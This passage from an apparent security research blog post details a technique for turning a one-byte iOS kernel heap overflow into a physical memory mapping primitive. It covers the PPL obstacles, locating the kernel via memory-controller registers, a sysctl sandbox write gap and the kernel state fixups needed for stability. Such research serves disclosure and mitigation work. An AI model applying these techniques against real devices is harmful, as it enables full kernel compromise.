         * map the pages into the destination map.
         */
        if (entry->wired_count != 0) {
...
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
...
                m = vm_page_lookup(object, offset);
...
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
...
                offset += PAGE_SIZE_64;
                va += PAGE_SIZE;
           }
       }
   }
...
        vm_map_copy_insert(dst_map, last, copy);
...
    vm_map_unlock(dst_map);
...
}

Let's walk through this step-by-step. First, other vm_map_copy types are handled:

    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }

The vm_map is locked:

    vm_map_lock(dst_map);

We enter a for loop over the linked list of (fake) vm_map_entry objects:

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:

        if (entry->wired_count != 0) {

When set, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:

            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {

We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:

                m = vm_page_lookup(object, offset);

And finally, we call vm_fault_enter() to fault in the page:

                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);

The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:

kern_return_t
pmap_enter_options(
        pmap_t pmap,
        vm_map_address_t v,
        ppnum_t pn,
        vm_prot_t prot,
        vm_prot_t fault_type,
        unsigned int flags,
        boolean_t wired,
        unsigned int options,
        __unused void   *arg)

pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.

Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!


An old friend

I decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.

First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.

Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.

This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.

Leaving the Shire

We've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:

  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.

  1. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    1. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    2. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive can not be one-shot.

  1. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.

A short cut to PAN

An important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.

While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.

Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.

However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.

Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.

At the sign of the panicking POC

With kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.

We start by creating the shared memory region in the kernel.

We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.



We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).



We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).



We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.

Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.



At this point, we have a kernel thread that is spinning ready to map any physical page we request.

To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".



While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.



Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.



This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:


The mines of memory

At this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.

My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.

The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.

But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.

The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.



At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.

As it turns out, this range is smaller than the kernelcache itself at 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that address 0x807000000 contains a kernelcache page.

However, I quickly ran into panics when trying to map the kernelcache:

panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"

This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.

The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.

In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.

if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {
    panic("%s: page belongs to PPL, " ...);
}

if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {
    panic("%s: page locked down, " ...);
}

The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.

And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.

A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two Techniques

The road to DRAM's guard

Yet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).

With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.

The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).

However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:

panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.

On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.

To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:


Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.

Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.

The voice of PPL

What did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:

wimg_bits = pmap_cache_attributes(pn); // checks io_attr_table
if ( flags )
    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;
pte |= wimg_to_pte(wimg_bits);
if ( wimg_bits & 0x4000 )
{
    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;
    if ( xprr_perm == 0xB )
        pte_perm_bits = 0x20000000000080LL;
    else if ( xprr_perm == 3 )
        pte_perm_bits = 0x20000000000000LL;
    else
        panic("Unsupported xPRR perm ...");
    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;
}
pmap_enter_pte(pmap, pte_p, pte, vaddr);

Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:

    addr         len        wimg     signature
0x620000000, 0x40000000,       0x27, 'PCIe'
0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep
0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio
0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop
0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp
0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb
0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb
0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave
...
0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base

Thus, we cannot map the DART into userspace to disable it.

The palantír

Even though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.

My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.

IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.

I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.



Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)

The back gate is closed

After finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.

iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.

If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.

Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.

The taming of sysctl

At this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.

I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.

XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache line size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.

The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then  reads that address.



Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.

However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:

// Sandbox check sysctl-read
ret = sb_evaluate(sandbox, 116u, &context);
if ( !ret )
{
    // Sandbox check sysctl-write
    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )
        ret = sb_evaluate(sandbox, 117u, &context);
    else
        ret = 0;
}

For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.

As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", which is a writable sysctl used to convert the string-name of a sysctl into the numeric form, which is faster to look up. It is used to implement sysctlnametomib(). So it makes sense that this sysctl should usually be writable.

The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyways, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.

III - The Return of the Copyout

The battle of pmap fields

We have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.



There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.

We will address the pmap/vm_map conflict first.

Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.

static void
vm_map_copy_insert(
    vm_map_t        map,
    vm_map_entry_t  after_where,
    vm_map_copy_t   copy)
{
    vm_map_entry_t  entry;

    while (vm_map_copy_first_entry(copy) !=
               vm_map_copy_to_entry(copy)) {
        entry = vm_map_copy_first_entry(copy);
        vm_map_copy_entry_unlink(copy, entry);
        vm_map_store_entry_link(map, after_where, entry,
            VM_MAP_KERNEL_FLAGS_NONE);
        after_where = entry;
    }
    zfree(vm_map_copy_zone, copy);
}

Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.

Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:

panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"

The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.

Due to PPL, we can not update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.

The fires of stack doom

Finally, it is time to break vm_map_copyout_internal() out of the for loop.

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

The macro vm_map_copy_to_entry(copy) expands to:

    (struct vm_map_entry *)(&copy->c_u.hdr.links)

Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.

The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's  vme_next to point to &copy->c_u.hdr.links. and then update the "done" entry's vme_next to point to the overlay entry.



The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of  type ENTRY_LIST:

    zfree(vm_map_copy_zone, copy);

However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.

Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!

FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]
FFFFFFF007C599A8     LDR     X25, [X28,#vm_map_copy.links.next]
FFFFFFF007C599AC     CMP     X25, X27
FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98
...                             ; The for loop
FFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr]
FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]

This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.



At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.

Homeward bound

Finally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.

Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.

When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.

The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.

It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.



At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that c_u.hdr.links.next overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the c_u.hdr.links.next fields.

After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.

Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.

The mitigating of the Shire

So, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?

The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.

First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that you do need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once you have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons: First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.

The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.

Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.

PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.

Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.

However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.

